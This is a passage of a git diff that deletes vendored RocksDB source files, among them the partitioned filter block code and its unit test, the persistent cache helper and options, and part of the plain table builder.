-                   "Could not read last index partition");
-    return;
-  }
-  uint64_t last_off = handle.offset() + handle.size() + kBlockTrailerSize;
-  uint64_t prefetch_len = last_off - prefetch_off;
-  std::unique_ptr<FilePrefetchBuffer> prefetch_buffer;
-  auto& file = table_->rep_->file;
-  prefetch_buffer.reset(new FilePrefetchBuffer());
-  s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len);
-
-  // After prefetch, read the partitions one by one
-  biter.SeekToFirst();
-  Cache* block_cache = rep->table_options.block_cache.get();
-  for (; biter.Valid(); biter.Next()) {
-    input = biter.value();
-    s = handle.DecodeFrom(&input);
-    assert(s.ok());
-    if (!s.ok()) {
-      ROCKS_LOG_WARN(rep->ioptions.info_log, "Could not read index partition");
-      continue;
-    }
-
-    const bool no_io = true;
-    const bool is_a_filter_partition = true;
-    auto filter = table_->GetFilter(prefetch_buffer.get(), handle,
-                                    is_a_filter_partition, !no_io);
-    if (LIKELY(filter.IsSet())) {
-      if (pin) {
-        filter_map_[handle.offset()] = std::move(filter);
-      } else {
-        block_cache->Release(filter.cache_handle);
-      }
-    } else {
-      delete filter.value;
-    }
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/partitioned_filter_block.h b/thirdparty/rocksdb/table/partitioned_filter_block.h
deleted file mode 100644
index 1a00a86..0000000
--- a/thirdparty/rocksdb/table/partitioned_filter_block.h
+++ /dev/null
@@ -1,102 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-
-#include <list>
-#include <string>
-#include <unordered_map>
-#include "db/dbformat.h"
-#include "rocksdb/options.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-
-#include "table/block.h"
-#include "table/block_based_table_reader.h"
-#include "table/full_filter_block.h"
-#include "table/index_builder.h"
-#include "util/autovector.h"
-
-namespace rocksdb {
-
-class PartitionedFilterBlockBuilder : public FullFilterBlockBuilder {
- public:
-  explicit PartitionedFilterBlockBuilder(
-      const SliceTransform* prefix_extractor, bool whole_key_filtering,
-      FilterBitsBuilder* filter_bits_builder, int index_block_restart_interval,
-      PartitionedIndexBuilder* const p_index_builder,
-      const uint32_t partition_size);
-
-  virtual ~PartitionedFilterBlockBuilder();
-
-  void AddKey(const Slice& key) override;
-
-  virtual Slice Finish(const BlockHandle& last_partition_block_handle,
-                       Status* status) override;
-
- private:
-  // Filter data
-  BlockBuilder index_on_filter_block_builder_;  // top-level index builder
-  struct FilterEntry {
-    std::string key;
-    Slice filter;
-  };
-  std::list<FilterEntry> filters;  // list of partitioned indexes and their keys
-  std::unique_ptr<IndexBuilder> value;
-  std::vector<std::unique_ptr<const char[]>> filter_gc;
-  bool finishing_filters =
-      false;  // true if Finish is called once but not complete yet.
-  // The policy of when cut a filter block and Finish it
-  void MaybeCutAFilterBlock();
-  // Currently we keep the same number of partitions for filters and indexes.
-  // This would allow for some potentioal optimizations in future. If such
-  // optimizations did not realize we can use different number of partitions and
-  // eliminate p_index_builder_
-  PartitionedIndexBuilder* const p_index_builder_;
-  // The desired number of filters per partition
-  uint32_t filters_per_partition_;
-  // The current number of filters in the last partition
-  uint32_t filters_in_partition_;
-};
-
-class PartitionedFilterBlockReader : public FilterBlockReader {
- public:
-  explicit PartitionedFilterBlockReader(const SliceTransform* prefix_extractor,
-                                        bool whole_key_filtering,
-                                        BlockContents&& contents,
-                                        FilterBitsReader* filter_bits_reader,
-                                        Statistics* stats,
-                                        const Comparator& comparator,
-                                        const BlockBasedTable* table);
-  virtual ~PartitionedFilterBlockReader();
-
-  virtual bool IsBlockBased() override { return false; }
-  virtual bool KeyMayMatch(
-      const Slice& key, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual bool PrefixMayMatch(
-      const Slice& prefix, uint64_t block_offset = kNotValid,
-      const bool no_io = false,
-      const Slice* const const_ikey_ptr = nullptr) override;
-  virtual size_t ApproximateMemoryUsage() const override;
-
- private:
-  Slice GetFilterPartitionHandle(const Slice& entry);
-  BlockBasedTable::CachableEntry<FilterBlockReader> GetFilterPartition(
-      FilePrefetchBuffer* prefetch_buffer, Slice* handle, const bool no_io,
-      bool* cached);
-  virtual void CacheDependencies(bool pin) override;
-
-  const SliceTransform* prefix_extractor_;
-  std::unique_ptr<Block> idx_on_fltr_blk_;
-  const Comparator& comparator_;
-  const BlockBasedTable* table_;
-  std::unordered_map<uint64_t,
-                     BlockBasedTable::CachableEntry<FilterBlockReader>>
-      filter_map_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/partitioned_filter_block_test.cc b/thirdparty/rocksdb/table/partitioned_filter_block_test.cc
deleted file mode 100644
index 1bc529e..0000000
--- a/thirdparty/rocksdb/table/partitioned_filter_block_test.cc
+++ /dev/null
@@ -1,299 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <map>
-
-#include "rocksdb/filter_policy.h"
-
-#include "table/full_filter_bits_builder.h"
-#include "table/index_builder.h"
-#include "table/partitioned_filter_block.h"
-#include "util/coding.h"
-#include "util/hash.h"
-#include "util/logging.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-std::map<uint64_t, Slice> slices;
-
-class MockedBlockBasedTable : public BlockBasedTable {
- public:
-  explicit MockedBlockBasedTable(Rep* rep) : BlockBasedTable(rep) {
-    // Initialize what Open normally does as much as necessary for the test
-    rep->cache_key_prefix_size = 10;
-  }
-
-  virtual CachableEntry<FilterBlockReader> GetFilter(
-      FilePrefetchBuffer*, const BlockHandle& filter_blk_handle,
-      const bool /* unused */, bool /* unused */) const override {
-    Slice slice = slices[filter_blk_handle.offset()];
-    auto obj = new FullFilterBlockReader(
-        nullptr, true, BlockContents(slice, false, kNoCompression),
-        rep_->table_options.filter_policy->GetFilterBitsReader(slice), nullptr);
-    return {obj, nullptr};
-  }
-};
-
-class PartitionedFilterBlockTest : public testing::Test {
- public:
-  BlockBasedTableOptions table_options_;
-  InternalKeyComparator icomp = InternalKeyComparator(BytewiseComparator());
-
-  PartitionedFilterBlockTest() {
-    table_options_.filter_policy.reset(NewBloomFilterPolicy(10, false));
-    table_options_.no_block_cache = true;  // Otherwise BlockBasedTable::Close
-                                           // will access variable that are not
-                                           // initialized in our mocked version
-  }
-
-  std::shared_ptr<Cache> cache_;
-  ~PartitionedFilterBlockTest() {}
-
-  const std::string keys[4] = {"afoo", "bar", "box", "hello"};
-  const std::string missing_keys[2] = {"missing", "other"};
-
-  uint64_t MaxIndexSize() {
-    int num_keys = sizeof(keys) / sizeof(*keys);
-    uint64_t max_key_size = 0;
-    for (int i = 1; i < num_keys; i++) {
-      max_key_size = std::max(max_key_size, static_cast<uint64_t>(keys[i].size()));
-    }
-    uint64_t max_index_size = num_keys * (max_key_size + 8 /*handle*/);
-    return max_index_size;
-  }
-
-  uint64_t MaxFilterSize() {
-    uint32_t dont_care1, dont_care2;
-    int num_keys = sizeof(keys) / sizeof(*keys);
-    auto filter_bits_reader = dynamic_cast<rocksdb::FullFilterBitsBuilder*>(
-        table_options_.filter_policy->GetFilterBitsBuilder());
-    assert(filter_bits_reader);
-    auto partition_size =
-        filter_bits_reader->CalculateSpace(num_keys, &dont_care1, &dont_care2);
-    delete filter_bits_reader;
-    return partition_size + table_options_.block_size_deviation;
-  }
-
-  int last_offset = 10;
-  BlockHandle Write(const Slice& slice) {
-    BlockHandle bh(last_offset + 1, slice.size());
-    slices[bh.offset()] = slice;
-    last_offset += bh.size();
-    return bh;
-  }
-
-  PartitionedIndexBuilder* NewIndexBuilder() {
-    return PartitionedIndexBuilder::CreateIndexBuilder(&icomp, table_options_);
-  }
-
-  PartitionedFilterBlockBuilder* NewBuilder(
-      PartitionedIndexBuilder* const p_index_builder) {
-    assert(table_options_.block_size_deviation <= 100);
-    auto partition_size = static_cast<uint32_t>(
-        table_options_.metadata_block_size *
-        ( 100 - table_options_.block_size_deviation));
-    partition_size = std::max(partition_size, static_cast<uint32_t>(1));
-    return new PartitionedFilterBlockBuilder(
-        nullptr, table_options_.whole_key_filtering,
-        table_options_.filter_policy->GetFilterBitsBuilder(),
-        table_options_.index_block_restart_interval, p_index_builder,
-        partition_size);
-  }
-
-  std::unique_ptr<MockedBlockBasedTable> table;
-
-  PartitionedFilterBlockReader* NewReader(
-      PartitionedFilterBlockBuilder* builder) {
-    BlockHandle bh;
-    Status status;
-    Slice slice;
-    do {
-      slice = builder->Finish(bh, &status);
-      bh = Write(slice);
-    } while (status.IsIncomplete());
-    const Options options;
-    const ImmutableCFOptions ioptions(options);
-    const EnvOptions env_options;
-    table.reset(new MockedBlockBasedTable(new BlockBasedTable::Rep(
-        ioptions, env_options, table_options_, icomp, false)));
-    auto reader = new PartitionedFilterBlockReader(
-        nullptr, true, BlockContents(slice, false, kNoCompression), nullptr,
-        nullptr, *icomp.user_comparator(), table.get());
-    return reader;
-  }
-
-  void VerifyReader(PartitionedFilterBlockBuilder* builder,
-                    bool empty = false) {
-    std::unique_ptr<PartitionedFilterBlockReader> reader(NewReader(builder));
-    // Querying added keys
-    const bool no_io = true;
-    for (auto key : keys) {
-      auto ikey = InternalKey(key, 0, ValueType::kTypeValue);
-      const Slice ikey_slice = Slice(*ikey.rep());
-      ASSERT_TRUE(reader->KeyMayMatch(key, kNotValid, !no_io, &ikey_slice));
-    }
-    {
-      // querying a key twice
-      auto ikey = InternalKey(keys[0], 0, ValueType::kTypeValue);
-      const Slice ikey_slice = Slice(*ikey.rep());
-      ASSERT_TRUE(reader->KeyMayMatch(keys[0], kNotValid, !no_io, &ikey_slice));
-    }
-    // querying missing keys
-    for (auto key : missing_keys) {
-      auto ikey = InternalKey(key, 0, ValueType::kTypeValue);
-      const Slice ikey_slice = Slice(*ikey.rep());
-      if (empty) {
-        ASSERT_TRUE(reader->KeyMayMatch(key, kNotValid, !no_io, &ikey_slice));
-      } else {
-        // assuming a good hash function
-        ASSERT_FALSE(reader->KeyMayMatch(key, kNotValid, !no_io, &ikey_slice));
-      }
-    }
-  }
-
-  int TestBlockPerKey() {
-    std::unique_ptr<PartitionedIndexBuilder> pib(NewIndexBuilder());
-    std::unique_ptr<PartitionedFilterBlockBuilder> builder(
-        NewBuilder(pib.get()));
-    int i = 0;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i], keys[i + 1]);
-    i++;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i], keys[i + 1]);
-    i++;
-    builder->Add(keys[i]);
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i], keys[i + 1]);
-    i++;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i]);
-
-    VerifyReader(builder.get());
-    return CountNumOfIndexPartitions(pib.get());
-  }
-
-  void TestBlockPerTwoKeys() {
-    std::unique_ptr<PartitionedIndexBuilder> pib(NewIndexBuilder());
-    std::unique_ptr<PartitionedFilterBlockBuilder> builder(
-        NewBuilder(pib.get()));
-    int i = 0;
-    builder->Add(keys[i]);
-    i++;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i], keys[i + 1]);
-    i++;
-    builder->Add(keys[i]);
-    builder->Add(keys[i]);
-    i++;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i]);
-
-    VerifyReader(builder.get());
-  }
-
-  void TestBlockPerAllKeys() {
-    std::unique_ptr<PartitionedIndexBuilder> pib(NewIndexBuilder());
-    std::unique_ptr<PartitionedFilterBlockBuilder> builder(
-        NewBuilder(pib.get()));
-    int i = 0;
-    builder->Add(keys[i]);
-    i++;
-    builder->Add(keys[i]);
-    i++;
-    builder->Add(keys[i]);
-    builder->Add(keys[i]);
-    i++;
-    builder->Add(keys[i]);
-    CutABlock(pib.get(), keys[i]);
-
-    VerifyReader(builder.get());
-  }
-
-  void CutABlock(PartitionedIndexBuilder* builder,
-                 const std::string& user_key) {
-    // Assuming a block is cut, add an entry to the index
-    std::string key =
-        std::string(*InternalKey(user_key, 0, ValueType::kTypeValue).rep());
-    BlockHandle dont_care_block_handle(1, 1);
-    builder->AddIndexEntry(&key, nullptr, dont_care_block_handle);
-  }
-
-  void CutABlock(PartitionedIndexBuilder* builder, const std::string& user_key,
-                 const std::string& next_user_key) {
-    // Assuming a block is cut, add an entry to the index
-    std::string key =
-        std::string(*InternalKey(user_key, 0, ValueType::kTypeValue).rep());
-    std::string next_key = std::string(
-        *InternalKey(next_user_key, 0, ValueType::kTypeValue).rep());
-    BlockHandle dont_care_block_handle(1, 1);
-    Slice slice = Slice(next_key.data(), next_key.size());
-    builder->AddIndexEntry(&key, &slice, dont_care_block_handle);
-  }
-
-  int CountNumOfIndexPartitions(PartitionedIndexBuilder* builder) {
-    IndexBuilder::IndexBlocks dont_care_ib;
-    BlockHandle dont_care_bh(10, 10);
-    Status s;
-    int cnt = 0;
-    do {
-      s = builder->Finish(&dont_care_ib, dont_care_bh);
-      cnt++;
-    } while (s.IsIncomplete());
-    return cnt - 1;  // 1 is 2nd level index
-  }
-};
-
-TEST_F(PartitionedFilterBlockTest, EmptyBuilder) {
-  std::unique_ptr<PartitionedIndexBuilder> pib(NewIndexBuilder());
-  std::unique_ptr<PartitionedFilterBlockBuilder> builder(NewBuilder(pib.get()));
-  const bool empty = true;
-  VerifyReader(builder.get(), empty);
-}
-
-TEST_F(PartitionedFilterBlockTest, OneBlock) {
-  uint64_t max_index_size = MaxIndexSize();
-  for (uint64_t i = 1; i < max_index_size + 1; i++) {
-    table_options_.metadata_block_size = i;
-    TestBlockPerAllKeys();
-  }
-}
-
-TEST_F(PartitionedFilterBlockTest, TwoBlocksPerKey) {
-  uint64_t max_index_size = MaxIndexSize();
-  for (uint64_t i = 1; i < max_index_size + 1; i++) {
-    table_options_.metadata_block_size = i;
-    TestBlockPerTwoKeys();
-  }
-}
-
-TEST_F(PartitionedFilterBlockTest, OneBlockPerKey) {
-  uint64_t max_index_size = MaxIndexSize();
-  for (uint64_t i = 1; i < max_index_size + 1; i++) {
-    table_options_.metadata_block_size = i;
-    TestBlockPerKey();
-  }
-}
-
-TEST_F(PartitionedFilterBlockTest, PartitionCount) {
-  int num_keys = sizeof(keys) / sizeof(*keys);
-  table_options_.metadata_block_size =
-      std::max(MaxIndexSize(), MaxFilterSize());
-  int partitions = TestBlockPerKey();
-  ASSERT_EQ(partitions, 1);
-  // A low number ensures cutting a block after each key
-  table_options_.metadata_block_size = 1;
-  partitions = TestBlockPerKey();
-  ASSERT_EQ(partitions, num_keys - 1 /* last two keys make one flush */);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/table/persistent_cache_helper.cc b/thirdparty/rocksdb/table/persistent_cache_helper.cc
deleted file mode 100644
index ec1cac0..0000000
--- a/thirdparty/rocksdb/table/persistent_cache_helper.cc
+++ /dev/null
@@ -1,114 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "table/persistent_cache_helper.h"
-#include "table/block_based_table_reader.h"
-#include "table/format.h"
-
-namespace rocksdb {
-
-void PersistentCacheHelper::InsertRawPage(
-    const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-    const char* data, const size_t size) {
-  assert(cache_options.persistent_cache);
-  assert(cache_options.persistent_cache->IsCompressed());
-
-  // construct the page key
-  char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key = BlockBasedTable::GetCacheKey(cache_options.key_prefix.c_str(),
-                                          cache_options.key_prefix.size(),
-                                          handle, cache_key);
-  // insert content to cache
-  cache_options.persistent_cache->Insert(key, data, size);
-}
-
-void PersistentCacheHelper::InsertUncompressedPage(
-    const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-    const BlockContents& contents) {
-  assert(cache_options.persistent_cache);
-  assert(!cache_options.persistent_cache->IsCompressed());
-  if (!contents.cachable || contents.compression_type != kNoCompression) {
-    // We shouldn't cache this. Either
-    // (1) content is not cacheable
-    // (2) content is compressed
-    return;
-  }
-
-  // construct the page key
-  char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key = BlockBasedTable::GetCacheKey(cache_options.key_prefix.c_str(),
-                                          cache_options.key_prefix.size(),
-                                          handle, cache_key);
-  // insert block contents to page cache
-  cache_options.persistent_cache->Insert(key, contents.data.data(),
-                                         contents.data.size());
-}
-
-Status PersistentCacheHelper::LookupRawPage(
-    const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-    std::unique_ptr<char[]>* raw_data, const size_t raw_data_size) {
-  assert(cache_options.persistent_cache);
-  assert(cache_options.persistent_cache->IsCompressed());
-
-  // construct the page key
-  char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key = BlockBasedTable::GetCacheKey(cache_options.key_prefix.c_str(),
-                                          cache_options.key_prefix.size(),
-                                          handle, cache_key);
-  // Lookup page
-  size_t size;
-  Status s = cache_options.persistent_cache->Lookup(key, raw_data, &size);
-  if (!s.ok()) {
-    // cache miss
-    RecordTick(cache_options.statistics, PERSISTENT_CACHE_MISS);
-    return s;
-  }
-
-  // cache hit
-  assert(raw_data_size == handle.size() + kBlockTrailerSize);
-  assert(size == raw_data_size);
-  RecordTick(cache_options.statistics, PERSISTENT_CACHE_HIT);
-  return Status::OK();
-}
-
-Status PersistentCacheHelper::LookupUncompressedPage(
-    const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-    BlockContents* contents) {
-  assert(cache_options.persistent_cache);
-  assert(!cache_options.persistent_cache->IsCompressed());
-  if (!contents) {
-    // We shouldn't lookup in the cache. Either
-    // (1) Nowhere to store
-    return Status::NotFound();
-  }
-
-  // construct the page key
-  char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length];
-  auto key = BlockBasedTable::GetCacheKey(cache_options.key_prefix.c_str(),
-                                          cache_options.key_prefix.size(),
-                                          handle, cache_key);
-  // Lookup page
-  std::unique_ptr<char[]> data;
-  size_t size;
-  Status s = cache_options.persistent_cache->Lookup(key, &data, &size);
-  if (!s.ok()) {
-    // cache miss
-    RecordTick(cache_options.statistics, PERSISTENT_CACHE_MISS);
-    return s;
-  }
-
-  // please note we are potentially comparing compressed data size with
-  // uncompressed data size
-  assert(handle.size() <= size);
-
-  // update stats
-  RecordTick(cache_options.statistics, PERSISTENT_CACHE_HIT);
-  // construct result and return
-  *contents =
-      BlockContents(std::move(data), size, false /*cacheable*/, kNoCompression);
-  return Status::OK();
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/persistent_cache_helper.h b/thirdparty/rocksdb/table/persistent_cache_helper.h
deleted file mode 100644
index ac8ee03..0000000
--- a/thirdparty/rocksdb/table/persistent_cache_helper.h
+++ /dev/null
@@ -1,44 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <string>
-
-#include "monitoring/statistics.h"
-#include "table/format.h"
-#include "table/persistent_cache_options.h"
-
-namespace rocksdb {
-
-struct BlockContents;
-
-// PersistentCacheHelper
-//
-// Encapsulates  some of the helper logic for read and writing from the cache
-class PersistentCacheHelper {
- public:
-  // insert block into raw page cache
-  static void InsertRawPage(const PersistentCacheOptions& cache_options,
-                            const BlockHandle& handle, const char* data,
-                            const size_t size);
-
-  // insert block into uncompressed cache
-  static void InsertUncompressedPage(
-      const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-      const BlockContents& contents);
-
-  // lookup block from raw page cacge
-  static Status LookupRawPage(const PersistentCacheOptions& cache_options,
-                              const BlockHandle& handle,
-                              std::unique_ptr<char[]>* raw_data,
-                              const size_t raw_data_size);
-
-  // lookup block from uncompressed cache
-  static Status LookupUncompressedPage(
-      const PersistentCacheOptions& cache_options, const BlockHandle& handle,
-      BlockContents* contents);
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/persistent_cache_options.h b/thirdparty/rocksdb/table/persistent_cache_options.h
deleted file mode 100644
index acd6403..0000000
--- a/thirdparty/rocksdb/table/persistent_cache_options.h
+++ /dev/null
@@ -1,34 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <string>
-
-#include "monitoring/statistics.h"
-#include "rocksdb/persistent_cache.h"
-
-namespace rocksdb {
-
-// PersistentCacheOptions
-//
-// This describe the caching behavior for page cache
-// This is used to pass the context for caching and the cache handle
-struct PersistentCacheOptions {
-  PersistentCacheOptions() {}
-  explicit PersistentCacheOptions(
-      const std::shared_ptr<PersistentCache>& _persistent_cache,
-      const std::string _key_prefix, Statistics* const _statistics)
-      : persistent_cache(_persistent_cache),
-        key_prefix(_key_prefix),
-        statistics(_statistics) {}
-
-  virtual ~PersistentCacheOptions() {}
-
-  std::shared_ptr<PersistentCache> persistent_cache;
-  std::string key_prefix;
-  Statistics* statistics = nullptr;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/table/plain_table_builder.cc b/thirdparty/rocksdb/table/plain_table_builder.cc
deleted file mode 100644
index 9648043..0000000
--- a/thirdparty/rocksdb/table/plain_table_builder.cc
+++ /dev/null
@@ -1,296 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "table/plain_table_builder.h"
-
-#include <assert.h>
-
-#include <string>
-#include <limits>
-#include <map>
-
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/table.h"
-#include "table/plain_table_factory.h"
-#include "db/dbformat.h"
-#include "table/block_builder.h"
-#include "table/bloom_block.h"
-#include "table/plain_table_index.h"
-#include "table/format.h"
-#include "table/meta_blocks.h"
-#include "util/coding.h"
-#include "util/crc32c.h"
-#include "util/file_reader_writer.h"
-#include "util/stop_watch.h"
-
-namespace rocksdb {
-
-namespace {
-
-// a utility that helps writing block content to the file
-//   @offset will advance if @block_contents was successfully written.
-//   @block_handle the block handle this particular block.
-Status WriteBlock(const Slice& block_contents, WritableFileWriter* file,
-                  uint64_t* offset, BlockHandle* block_handle) {
-  block_handle->set_offset(*offset);
-  block_handle->set_size(block_contents.size());
-  Status s = file->Append(block_contents);
-
-  if (s.ok()) {
-    *offset += block_contents.size();
-  }
-  return s;
-}
-
-}  // namespace
-
-// kPlainTableMagicNumber was picked by running
-//    echo rocksdb.table.plain | sha1sum
-// and taking the leading 64 bits.
-extern const uint64_t kPlainTableMagicNumber = 0x8242229663bf9564ull;
-extern const uint64_t kLegacyPlainTableMagicNumber = 0x4f3418eb7a8f13b8ull;
-
-PlainTableBuilder::PlainTableBuilder(
-    const ImmutableCFOptions& ioptions,
-    const std::vector<std::unique_ptr<IntTblPropCollectorFactory>>*
-        int_tbl_prop_collector_factories,
-    uint32_t column_family_id, WritableFileWriter* file, uint32_t user_key_len,
-    EncodingType encoding_type, size_t index_sparseness,
-    uint32_t bloom_bits_per_key, const std::string& column_family_name,
-    uint32_t num_probes, size_t huge_page_tlb_size, double hash_table_ratio,
-    bool store_index_in_file)
-    : ioptions_(ioptions),
-      bloom_block_(num_probes),
-      file_(file),
-      bloom_bits_per_key_(bloom_bits_per_key),
-      huge_page_tlb_size_(huge_page_tlb_size),
-      encoder_(encoding_type, user_key_len, ioptions.prefix_extractor,
-               index_sparseness),
-      store_index_in_file_(store_index_in_file),
-      prefix_extractor_(ioptions.prefix_extractor) {
-  // Build index block and save it in the file if hash_table_ratio > 0
-  if (store_index_in_file_) {
-    assert(hash_table_ratio > 0 || IsTotalOrderMode());
-    index_builder_.reset(
-        new PlainTableIndexBuilder(&arena_, ioptions, index_sparseness,
-                                   hash_table_ratio, huge_page_tlb_size_));
-    properties_.user_collected_properties
-        [PlainTablePropertyNames::kBloomVersion] = "1";  // For future use
-  }
-
-  properties_.fixed_key_len = user_key_len;
-
-  // for plain table, we put all the data in a big chuck.
-  properties_.num_data_blocks = 1;
-  // Fill it later if store_index_in_file_ == true
-  properties_.index_size = 0;
-  properties_.filter_size = 0;
-  // To support roll-back to previous version, now still use version 0 for
-  // plain encoding.
-  properties_.format_version = (encoding_type == kPlain) ? 0 : 1;
-  properties_.column_family_id = column_family_id;
-  properties_.column_family_name = column_family_name;
-  properties_.prefix_extractor_name = ioptions_.prefix_extractor != nullptr
-                                          ? ioptions_.prefix_extractor->Name()
-                                          : "nullptr";
-
-  std::string val;
-  PutFixed32(&val, static_cast<uint32_t>(encoder_.GetEncodingType()));
-  properties_.user_collected_properties
-      [PlainTablePropertyNames::kEncodingType] = val;
-
-  for (auto& collector_factories : *int_tbl_prop_collector_factories) {
-    table_properties_collectors_.emplace_back(
-        collector_factories->CreateIntTblPropCollector(column_family_id));
-  }
-}
-
-PlainTableBuilder::~PlainTableBuilder() {
-}
-
-void PlainTableBuilder::Add(const Slice& key, const Slice& value) {
-  // temp buffer for metadata bytes between key and value.
-  char meta_bytes_buf[6];
-  size_t meta_bytes_buf_size = 0;
-
-  ParsedInternalKey internal_key;
-  if (!ParseInternalKey(key, &internal_key)) {
-    assert(false);
-    return;
-  }
-  if (internal_key.type == kTypeRangeDeletion) {
-    status_ = Status::NotSupported("Range deletion unsupported");
-    return;
-  }
-
-  // Store key hash
-  if (store_index_in_file_) {
-    if (ioptions_.prefix_extractor == nullptr) {
-      keys_or_prefixes_hashes_.push_back(GetSliceHash(internal_key.user_key));
-    } else {
-      Slice prefix =
-          ioptions_.prefix_extractor->Transform(internal_key.user_key);
-      keys_or_prefixes_hashes_.push_back(GetSliceHash(prefix));
-    }
-  }
-
-  // Write value
-  assert(offset_ <= std::numeric_limits<uint32_t>::max());
-  auto prev_offset = static_cast<uint32_t>(offset_);
-  // Write out the key
-  encoder_.AppendKey(key, file_, &offset_, meta_bytes_buf,
-                     &meta_bytes_buf_size);
-  if (SaveIndexInFile()) {
-    index_builder_->AddKeyPrefix(GetPrefix(internal_key), prev_offset);
-  }
-
-  // Write value length
-  uint32_t value_size = static_cast<uint32_t>(value.size());
-  char* end_ptr =
-      EncodeVarint32(meta_bytes_buf + meta_bytes_buf_size, value_size);
-  assert(end_ptr <= meta_bytes_buf + sizeof(meta_bytes_buf));
-  meta_bytes_buf_size = end_ptr - meta_bytes_buf;
-  file_->Append(Slice(meta_bytes_buf, meta_bytes_buf_size));
-
-  // Write value
-  file_->Append(value);
-  offset_ += value_size + meta_bytes_buf_size;
-
-  properties_.num_entries++;
-  properties_.raw_key_size += key.size();
-  properties_.raw_value_size += value.size();
-
-  // notify property collectors
-  NotifyCollectTableCollectorsOnAdd(
-      key, value, offset_, table_properties_collectors_, ioptions_.info_log);
-}
-
-Status PlainTableBuilder::status() const { return status_; }
-
-Status PlainTableBuilder::Finish() {
-  assert(!closed_);
-  closed_ = true;
-
-  properties_.data_size = offset_;
-
-  //  Write the following blocks
-  //  1. [meta block: bloom] - optional
-  //  2. [meta block: index] - optional
-  //  3. [meta block: properties]
-  //  4. [metaindex block]
-  //  5. [footer]
-
-  MetaIndexBuilder meta_index_builer;
-
-  if (store_index_in_file_ && (properties_.num_entries > 0)) {
-    assert(properties_.num_entries <= std::numeric_limits<uint32_t>::max());
-    Status s;
-    BlockHandle bloom_block_handle;
-    if (bloom_bits_per_key_ > 0) {
-      bloom_block_.SetTotalBits(
-          &arena_,
-          static_cast<uint32_t>(properties_.num_entries) * bloom_bits_per_key_,
-          ioptions_.bloom_locality, huge_page_tlb_size_, ioptions_.info_log);
-
-      PutVarint32(&properties_.user_collected_properties
-                       [PlainTablePropertyNames::kNumBloomBlocks],
-                  bloom_block_.GetNumBlocks());
-
-      bloom_block_.AddKeysHashes(keys_or_prefixes_hashes_);
-
-      Slice bloom_finish_result = bloom_block_.Finish();
-
-      properties_.filter_size = bloom_finish_result.size();
-      s = WriteBlock(bloom_finish_result, file_, &offset_, &bloom_block_handle);
-
-      if (!s.ok()) {
-        return s;
-      }
-      meta_index_builer.Add(BloomBlockBuilder::kBloomBlock, bloom_block_handle);
-    }
-    BlockHandle index_block_handle;
-    Slice index_finish_result = index_builder_->Finish();
-
-    properties_.index_size = index_finish_result.size();
-    s = WriteBlock(index_finish_result, file_, &offset_, &index_block_handle);
-
-    if (!s.ok()) {
-      return s;
-    }
-
-    meta_index_builer.Add(PlainTableIndexBuilder::kPlainTableIndexBlock,
-                          index_block_handle);
-  }
-
-  // Calculate bloom block size and index block size
-  PropertyBlockBuilder property_block_builder;
-  // -- Add basic properties
-  property_block_builder.AddTableProperty(properties_);
-
-  property_block_builder.Add(properties_.user_collected_properties);
-
-  // -- Add user collected properties
-  NotifyCollectTableCollectorsOnFinish(table_properties_collectors_,
-                                       ioptions_.info_log,
-                                       &property_block_builder);
-
